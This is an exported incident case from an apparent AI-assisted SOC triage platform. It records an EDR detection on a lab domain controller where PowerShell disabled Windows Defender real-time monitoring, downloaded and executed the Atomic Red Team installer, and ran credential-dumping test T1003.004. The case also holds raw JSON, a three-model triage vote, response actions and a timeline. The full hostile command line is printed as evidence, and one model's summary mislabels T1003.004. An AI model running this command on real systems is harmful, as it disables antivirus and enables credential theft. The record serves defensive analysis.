high closed true positive

๐Ÿท๏ธ Analyst Verdict Classification

TP by analyst

🤖 AI Analysis

🔔 Detections (1)

00088-WIN-Set-MpPreference_Disabled high
Rule: service.WIN-Set-MpPreference_Disabled
Hostname: df-labsdc01.dflabs.local · Sensor: e4a1c62d-4d1f-44...
Event Type: NEW_PROCESS
Confidence: 88% · Verdict: true positive
Event Data:
BASE_ADDRESS:
140694944940032
COMMAND_LINE:
PowerShell.exe Set-ExecutionPolicy Unrestricted ; [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 ; Install-PackageProvider -Name NuGet -MinimumVersion 2.8.5.201 -Force; Set-MpPreference -DisableRealtimeMonitoring $true ; IEX (IWR 'https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/install-atomicredteam.ps1' -UseBasicParsing) ; Install-AtomicRedTeam -Force -getAtomics; Invoke-AtomicTest T1003.004 -CheckPrereqs ; Invoke-AtomicTest T1003.004 -GetPrereqs ; Invoke-AtomicTest T1003.004
FILE_IS_SIGNED:
1
FILE_PATH:
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
HASH:
de96a6e69944335375dc1ac238336066889d9ffc7d73628ef4fe1b1b160ab32c
MEMORY_USAGE:
210673664
PARENT:
{'BASE_ADDRESS': 140698856259584, 'COMMAND_LINE': 'cmd.exe /C C:\\Windows\\TEMP\\pldC873.tmp.bat T1003.004 ', 'FILE_IS_SIGNED': 1, 'FILE_PATH': 'C:\\Windows\\System32\\cmd.exe', 'HASH': '3656f37a1c6951ec4496fabb8ee957d3a6e3c276d5a3785476b482c9c0d32ea2', 'MEMORY_USAGE': 4489216, 'PARENT_ATOM': 'd2b1ecad7af81b32ac16ae0d69c2a7fe', 'PARENT_PROCESS_ID': 3496, 'PROCESS_ID': 3600, 'THIS_ATOM': '603c0894c1efd30bc14ce13269c2a84d', 'THREADS': 3, 'TIMESTAMP': 1774364748698, 'USER_NAME': 'NT AUTHORITY\\SYSTEM'}
PARENT_PROCESS_ID:
3600
PROCESS_ID:
9092
THREADS:
30
USER_NAME:
NT AUTHORITY\SYSTEM
IOCs: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/install-atomicredteam.ps1 Set-MpPreference -DisableRealtimeMonitoring $true
MITRE: T1562.001 T1003.004 T1059.001
Analyst Declaration:
📄 Raw Detection JSON
{
  "author": "_soteria-rules-edr-926e2197-189b-4d89-9675-c8993933dc9a[bulk][segment]",
  "cat": "00088-WIN-Set-MpPreference_Disabled",
  "detect": {
    "event": {
      "BASE_ADDRESS": 140694944940032,
      "COMMAND_LINE": "PowerShell.exe  Set-ExecutionPolicy Unrestricted ; [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 ; Install-PackageProvider -Name NuGet -MinimumVersion 2.8.5.201 -Force; Set-MpPreference -DisableRealtimeMonitoring $true ; IEX (IWR \u0027https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/install-atomicredteam.ps1\u0027 -UseBasicParsing) ; Install-AtomicRedTeam -Force -getAtomics; Invoke-AtomicTest T1003.004 -CheckPrereqs ; Invoke-AtomicTest T1003.004 -GetPrereqs ; Invoke-AtomicTest T1003.004 ",
      "FILE_IS_SIGNED": 1,
      "FILE_PATH": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
      "HASH": "de96a6e69944335375dc1ac238336066889d9ffc7d73628ef4fe1b1b160ab32c",
      "MEMORY_USAGE": 210673664,
      "PARENT": {
        "BASE_ADDRESS": 140698856259584,
        "COMMAND_LINE": "cmd.exe /C C:\\Windows\\TEMP\\pldC873.tmp.bat T1003.004 ",
        "FILE_IS_SIGNED": 1,
        "FILE_PATH": "C:\\Windows\\System32\\cmd.exe",
        "HASH": "3656f37a1c6951ec4496fabb8ee957d3a6e3c276d5a3785476b482c9c0d32ea2",
        "MEMORY_USAGE": 4489216,
        "PARENT_ATOM": "d2b1ecad7af81b32ac16ae0d69c2a7fe",
        "PARENT_PROCESS_ID": 3496,
        "PROCESS_ID": 3600,
        "THIS_ATOM": "603c0894c1efd30bc14ce13269c2a84d",
        "THREADS": 3,
        "TIMESTAMP": 1774364748698,
        "USER_NAME": "NT AUTHORITY\\SYSTEM"
      },
      "PARENT_PROCESS_ID": 3600,
      "PROCESS_ID": 9092,
      "THREADS": 30,
      "USER_NAME": "NT AUTHORITY\\SYSTEM"
    },
    "routing": {
      "arch": 2,
      "did": "",
      "event_id": "6220d8dd-dafe-4022-bc42-39c50347f3cc",
      "event_time": 1774364749274,
      "event_type": "NEW_PROCESS",
      "ext_ip": "67.60.122.240",
      "hostname": "df-labsdc01.dflabs.local",
      "iid": "47501359-645e-4049-906e-e6195da7afcf",
      "int_ip": "192.168.45.129",
      "latency": 2841,
      "moduleid": 2,
      "oid": "ad19afae-3759-4207-b06e-8648b225c455",
      "parent": "603c0894c1efd30bc14ce13269c2a84d",
      "plat": 268435456,
      "sid": "e4a1c62d-4d1f-4472-bae4-43291246b4d4",
      "tags": [
        "domain-controller",
        "fusion-soc-alert",
        "fusion-soc-case",
        "fusion-soc-pulled",
        "fusion-soc-triage"
      ],
      "this": "ce62e2fb3788a5371aa5449e69c2a84f"
    }
  },
  "detect_id": "0c5a2547-75e5-4543-9445-bab569c2a850",
  "detect_mtd": {
    "description": "Set-MpPreference is a powershell commandlet that configures preferences for Windows Defender scans and updates. This detector looks for Set-MpPreference commandlet supplied with the disable flag.",
    "falsepositives": [
      "This should always be considered suspicious as this is indicating an attempt to disable the AV on the system in question."
    ],
    "references": [
      "https://meterpreter.org/the-latest-trickbot-variant-with-stealthy-code-injection-trick-appear/",
      "https://www.cyberbit.com/blog/endpoint-security/latest-trickbot-variant-has-new-tricks-up-its-sleeve/"
    ],
    "tags": [
      "attack.t1562.001",
      "attack.t1059.001"
    ]
  },
  "gen_time": 1774364752115,
  "link": "https://app.limacharlie.io/orgs/ad19afae-3759-4207-b06e-8648b225c455/sensors/e4a1c62d-4d1f-4472-bae4-43291246b4d4/timeline?time=1774364749\u0026selected=ce62e2fb3788a5371aa5449e69c2a84f",
  "namespace": "general",
  "priority": 3,
  "routing": {
    "arch": 2,
    "did": "",
    "event_id": "6220d8dd-dafe-4022-bc42-39c50347f3cc",
    "event_time": 1774364749274,
    "event_type": "NEW_PROCESS",
    "ext_ip": "67.60.122.240",
    "hostname": "df-labsdc01.dflabs.local",
    "iid": "47501359-645e-4049-906e-e6195da7afcf",
    "int_ip": "192.168.45.129",
    "latency": 2841,
    "moduleid": 2,
    "oid": "ad19afae-3759-4207-b06e-8648b225c455",
    "parent": "603c0894c1efd30bc14ce13269c2a84d",
    "plat": 268435456,
    "sid": "e4a1c62d-4d1f-4472-bae4-43291246b4d4",
    "tags": [
      "domain-controller",
      "fusion-soc-alert",
      "fusion-soc-case",
      "fusion-soc-pulled",
      "fusion-soc-triage"
    ],
    "this": "ce62e2fb3788a5371aa5449e69c2a84f"
  },
  "rule_tags": [
    "ext:soteria-rules-edr",
    "attack.t1059.001",
    "attack.t1562.001"
  ],
  "source": "ad19afae-3759-4207-b06e-8648b225c455.47501359-645e-4049-906e-e6195da7afcf.e4a1c62d-4d1f-4472-bae4-43291246b4d4.10000000.2",
  "source_rule": "service.WIN-Set-MpPreference_Disabled",
  "ts": 1774364752000
}
๐ŸŒ Threat Intel JSON
{
  "virustotal": {
    "malicious": false,
    "provider": "virustotal",
    "reputation": 73,
    "stats": {
      "confirmed-timeout": 0,
      "failure": 0,
      "harmless": 0,
      "malicious": 0,
      "suspicious": 0,
      "timeout": 0,
      "type-unsupported": 4,
      "undetected": 72
    }
  }
}
🤖 Triage JSON
{
  "confidence": 0.883,
  "false_positive_reason": null,
  "investigation_questions": [
    "Is there a change ticket or authorization record for Atomic Red Team testing on this date?",
    "Were any actual credentials extracted or was the test run with dummy data?"
  ],
  "ioc_analysis": "The PowerShell command line includes \u0027Set-MpPreference -DisableRealtimeMonitoring $true\u0027, which is a high-confidence indicator of defense evasion (T1562.001). It also downloads the \u0027install-atomicredteam.ps1\u0027 script from the official Red Canary GitHub repository, confirming the use of red team tools.",
  "iocs_extracted": [
    "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
    "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/install-atomicredteam.ps1",
    "Set-MpPreference -DisableRealtimeMonitoring $true"
  ],
  "mitre_techniques": [
    "T1562.001",
    "T1003.004",
    "T1059.001"
  ],
  "recommended_actions": [
    "Manual analyst review required \u2014 AI models (majority)",
    "Verify with the security team if Atomic Red Team testing was authorized on this host.",
    "Confirm that Windows Defender Real-Time Monitoring was re-enabled after the test completion.",
    "Monitor for any signs of credential exfiltration or lateral movement originating from this host."
  ],
  "risk_score": 90,
  "severity": "high",
  "summary": "**Vote: MAJORITY (2/3 -\u003e TRUE POSITIVE)**\n\n### \u264a gemini-cli Analysis (Primary)\n**Verdict:** true_positive | **Confidence:** 1.0\nThe detection triggered due to PowerShell being used to disable Windows Defender Real-Time Monitoring and subsequently download and execute Atomic Red Team tests, specifically focusing on credential dumping (T1003.004). The command line is explicitly identified as Atomic Red Team installation and test execution, which correctly matches the detection rule for defense impairment.\n\n**IOC Analysis:** The PowerShell command line includes \u0027Set-MpPreference -DisableRealtimeMonitoring $true\u0027, which is a high-confidence indicator of defense evasion (T1562.001). It also downloads the \u0027install-atomicredteam.ps1\u0027 script from the official Red Canary GitHub repository, confirming the use of red team tools.\n\n---\n\n### \ud83e\udd16 qwen3.5:4b Analysis (Secondary)\n**Verdict:** true_positive | **Confidence:** 0.95\nThis detection represents a confirmed malicious activity where PowerShell is executing an Atomic Red Team (ART) attack module to disable real-time monitoring and test T1003.004 (Abuse of Software Update Services). The process is running under SYSTEM privileges from System32 but the command line contains clear indicators of an active attack.\n\n**IOC Analysis:** The PowerShell command explicitly disables real-time monitoring via Set-MpPreference, downloads and executes code from a GitHub repository using IEX (Invoke-Expression), and runs Atomic Red Team tests. While the process path is legitimate (System32) and signed, the behavior is malicious because it combines policy manipulation with remote code execution to test exploit capabilities.\n\n---\n\n### \ud83e\udd16 deepseek-r1:8b Analysis (Secondary)\n**Verdict:** suspicious | **Confidence:** 0.7\nThe detection event involves a PowerShell process from the legitimate System32 directory executing commands to disable Windows Defender real-time monitoring and install AtomicRedTeam, a tool often associated with red teaming. This behavior is suspicious and could indicate an attack attempt.\n\n**IOC Analysis:** The FILE_PATH is C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe, which is a known legitimate Windows system binary located in its expected directory. The hash is signed, indicating it\u0027s likely Microsoft-signed. However, the command line shows malicious activity, including disabling security features and installing potentially harmful tools. The parent process is cmd.exe from System32, which is legitimate, but invoked from a temporary script, raising suspicion.",
  "verdict": "true_positive",
  "voting": {
    "auto_action": "manual_review",
    "mode": "majority",
    "total_models": 3,
    "vote_summary": [
      "gemini-cli: true_positive (high, 100% confidence)",
      "qwen3.5:4b: true_positive (critical, 95% confidence)",
      "deepseek-r1:8b: suspicious (high, 70% confidence)"
    ],
    "votes": [
      {
        "confidence": 1.0,
        "model": "gemini-cli",
        "verdict": "true_positive"
      },
      {
        "confidence": 0.95,
        "model": "qwen3.5:4b",
        "verdict": "true_positive"
      },
      {
        "confidence": 0.7,
        "model": "deepseek-r1:8b",
        "verdict": "suspicious"
      }
    ],
    "winning_count": 2,
    "winning_verdict": "true_positive"
  }
}

โš™๏ธ Response Actions

| Action | Target | Status | Result |
| --- | --- | --- | --- |
| tag | e4a1c62d-4d1f-4472-bae4-43291246b4d4:fusionsoc-investigated | failed | 401 Client Error: Unauthorized for url: https://api.limacharlie.io/v1/e4a1c62d-4d1f-4472-bae4-43291246b4d4/tags?tags=fusionsoc-investigated |
| recommended | Manual analyst review required — AI models (majority) | executed | General Activity Sweep: 0 events found |
| recommended | Verify with the security team if Atomic Red Team testing was authorized on this host. | executed | General Activity Sweep: 0 events found |
| recommended | Confirm that Windows Defender Real-Time Monitoring was re-enabled after the test completion. | executed | General Activity Sweep: 0 events found |
| recommended | Monitor for any signs of credential exfiltration or lateral movement originating from this host. | executed | Lateral Movement Investigation: 50 events found |

๐Ÿ“ Add Note

💬 Notes (5)

🤖 FusionSOC AI 2026-03-24T16:42
🤖 FusionSOC AI 2026-03-24T16:42
🤖 FusionSOC AI 2026-03-24T16:42
🤖 FusionSOC AI 2026-03-24T16:42
🤖 FusionSOC AI 2026-03-24T16:42

📜 Timeline

2026-03-24T17:24:18
analyst
Status changed: investigating → closed
2026-03-24T17:23:59
analyst
Analyst classified as True Positive (TP)
2026-03-24T16:42:12
FusionSOC AI
Status changed: investigating → investigating
2026-03-24T16:42:12
FusionSOC
Action recommended → executed: Lateral Movement Investigation: 50 events found
2026-03-24T16:42:12
FusionSOC AI
Note by FusionSOC AI: ## ๐Ÿ” Lateral Movement Investigation **Action:** Monitor for any signs of credential exfiltration or lateral movement ori...
2026-03-24T16:42:11
FusionSOC
Response action queued: recommended on Monitor for any signs of credential exfiltration or lateral movement originating from this host.
2026-03-24T16:42:11
FusionSOC AI
Status changed: investigating → investigating
2026-03-24T16:42:11
FusionSOC
Action recommended → executed: General Activity Sweep: 0 events found
2026-03-24T16:42:11
FusionSOC AI
Note by FusionSOC AI: ## ๐Ÿ” General Activity Sweep **Action:** Confirm that Windows Defender Real-Time Monitoring was re-enabled after the test...
2026-03-24T16:42:11
FusionSOC
Response action queued: recommended on Confirm that Windows Defender Real-Time Monitoring was re-enabled after the test completion.
2026-03-24T16:42:11
FusionSOC AI
Status changed: investigating → investigating
2026-03-24T16:42:11
FusionSOC
Action recommended → executed: General Activity Sweep: 0 events found
2026-03-24T16:42:11
FusionSOC AI
Note by FusionSOC AI: ## ๐Ÿ” General Activity Sweep **Action:** Verify with the security team if Atomic Red Team testing was authorized on this ...
2026-03-24T16:42:11
FusionSOC
Response action queued: recommended on Verify with the security team if Atomic Red Team testing was authorized on this host.
2026-03-24T16:42:11
FusionSOC AI
Status changed: open → investigating
2026-03-24T16:42:11
FusionSOC
Action recommended → executed: General Activity Sweep: 0 events found
2026-03-24T16:42:11
FusionSOC AI
Note by FusionSOC AI: ## ๐Ÿ” General Activity Sweep **Action:** Manual analyst review required โ€” AI models (majority) **Sensor:** `e4a1c62d-4d1f...
2026-03-24T16:42:10
FusionSOC
Response action queued: recommended on Manual analyst review required — AI models (majority)
2026-03-24T16:42:10
FusionSOC
Action tag → failed: 401 Client Error: Unauthorized for url: https://api.limacharlie.io/v1/e4a1c62d-4d1f-4472-bae4-43291246b4d4/tags?tags=fusionsoc-investigated
2026-03-24T16:42:10
FusionSOC
Response action queued: tag on e4a1c62d-4d1f-4472-bae4-43291246b4d4:fusionsoc-investigated
2026-03-24T16:42:10
FusionSOC AI
Detection 0c5a2547-75e5-4543-9445-bab569c2a850 triaged as true_positive (high severity, confidence: 88%)
2026-03-24T16:42:10
FusionSOC AI
Case created from detection: service.WIN-Set-MpPreference_Disabled